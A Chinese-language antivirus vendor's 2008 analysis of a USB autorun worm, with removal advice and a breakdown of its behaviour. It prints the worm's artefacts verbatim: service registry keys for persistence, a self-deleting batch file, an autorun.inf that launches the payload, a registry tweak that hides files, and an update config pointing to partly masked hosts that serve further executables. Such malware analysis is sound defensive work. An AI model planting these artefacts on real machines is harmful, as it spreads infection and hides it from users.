捕獲時間
2008-12-26
病毒摘要
該樣本是使用“VC”編寫的蠕蟲程序,由微點主動防御軟件自動捕獲����,采用“nSPack”加殼方式試圖躲避特征碼掃描,加殼后長度為“18,470 字節(jié)”��,圖標為“
”���,病毒擴展名為“exe”����,主要通過“網(wǎng)頁木馬”���、“文件捆綁”����、“移動存儲介質”等方式傳播,運行后病毒主要感染文件并聯(lián)網(wǎng)下載其他木馬到本地運行��。
感染對象
Windows 2000/Windows XP/Windows 2003
傳播途徑
網(wǎng)頁木馬�、文件捆綁��、移動存儲介質
防范措施
已安裝使用微點主動防御軟件的用戶�����,無須任何設置��,微點主動防御將自動保護您的系統(tǒng)免受該病毒的入侵和破壞。無論您是否已經(jīng)升級到最新版本�����,微點主動防御都能夠有效清除該病毒��。如果您沒有將微點主動防御軟件升級到最新版����,微點主動防御軟件在發(fā)現(xiàn)該病毒后將報警提示您發(fā)現(xiàn)“未知間諜軟件”�����,請直接選擇刪除處理(如圖1)���;
圖1 微點主動防御軟件自動捕獲未知病毒(未升級)
如果您已經(jīng)將微點主動防御軟件升級到最新版本����,微點將報警提示您發(fā)現(xiàn)"Worm.Win32.AutoRun.jaq”��,請直接選擇刪除(如圖2)�。
圖2 微點主動防御軟件升級后截獲已知病毒
對于未使用微點主動防御軟件的用戶��,微點反病毒專家建議:
1����、不要在不明站點下載非官方版本的軟件進行安裝�����,避免病毒通過捆綁的方式進入您的系統(tǒng)。
2、建議關閉U盤自動播放�,具體操作步驟:開始->運行->gpedit.msc->計算機配置->管理模板->系統(tǒng)->在右側找到"關閉自動播放"->雙擊->選擇"已啟用"�����。
3、盡快將您的殺毒軟件特征庫升級到最新版本進行查殺,并開啟防火墻攔截網(wǎng)絡異常訪問��,如依然有異常情況請注意及時與專業(yè)的安全軟件廠商聯(lián)系獲取技術支持���。
4��、開啟windows自動更新�,及時打好漏洞補丁�����。
病毒分析
該樣本程序被執(zhí)行后�,將復制自身至系統(tǒng)目錄“%SystemRoot%\system32”���,重命名為“7CE81C8.EXE”�,修改注冊表,將“7CE81C8.EXE”注冊為名為“93088076”的服務�����,實現(xiàn)自啟動���,相關注冊表如下:
| |
鍵:“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\93088076”
值:“Type”
數(shù)據(jù):“SERVICE WIN32 OWN PROCESS”
值:“Start”
數(shù)據(jù):“SERVICE AUTO START”
值:“ImagePath”
數(shù)據(jù):“C:\WINDOWS\system32\7CE81C8.EXE -k”
值:“DisplayName”
數(shù)據(jù):“93088076” |
|
服務建立后����,病毒將啟動服務����,并釋放批處理文件“delme.bat”至系統(tǒng)目錄“%SystemRoot%\system32”,實現(xiàn)自刪除,批處理內(nèi)容如下:
| |
@echo off
:selfkill
del /F /Q "C:\Sample.exe"
if exist "C:Sample.exe" goto selfkill
del %0 |
|
服務啟動后�����,“7CE81C8.EXE”釋放動態(tài)庫文件“232A68F8.DLL”至系統(tǒng)目錄“%SystemRoot%\system32”,申請內(nèi)存空間將動態(tài)庫“232A68F8.DLL”寫入系統(tǒng)進程“winlogon.exe”���,使用遠程線程激活被寫入的病毒代碼實現(xiàn)注入,隨后“winlogon.exe”將嘗試注入系統(tǒng)當前存在全部進程����。
遍歷磁盤���,嘗試將“7CE81C8.EXE”復制至各磁盤根目錄����,重命名為“auto.exe”����,并生成“autorun.inf”,使“auto.exe”隨用戶打開盤符時運行���,并將文件設置為隱藏屬性。“autorun.inf”內(nèi)容如下:
| |
[AutoRun]
open=auto.exe
shellexecute=auto.exe
shell\Auto\command=auto.exe |
|
修改注冊表,企圖使文件不可見,相關注冊表如下:
| |
鍵:“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue”
值:“CheckedValue”
數(shù)據(jù):“0” |
|
訪問網(wǎng)絡地址:http://count.fu****ion.com/cnzz/update.txt���,讀取升級文件、下載惡意程序���、上傳統(tǒng)計信息���。Updat.txt內(nèi)容如下:
| |
| [update] ver=2008040422 url=http://count.fu****ion.com/cnzz/soft/cnzz.exe timer=1 timerbegin=0 [popwin] popwin=0 count=0 [file] file=1 file1=http://ad.l***n.com/ad.exe filename1=skkj1.exe ftime1=0 file2=http://google.n***dn.com/cao/cao.exe filename2=skkj2.exe ftime2=0 count=2 [count] count=1 mecount=1 url=http://count.fu****ion.com/cnzz/count/count.asp |
|
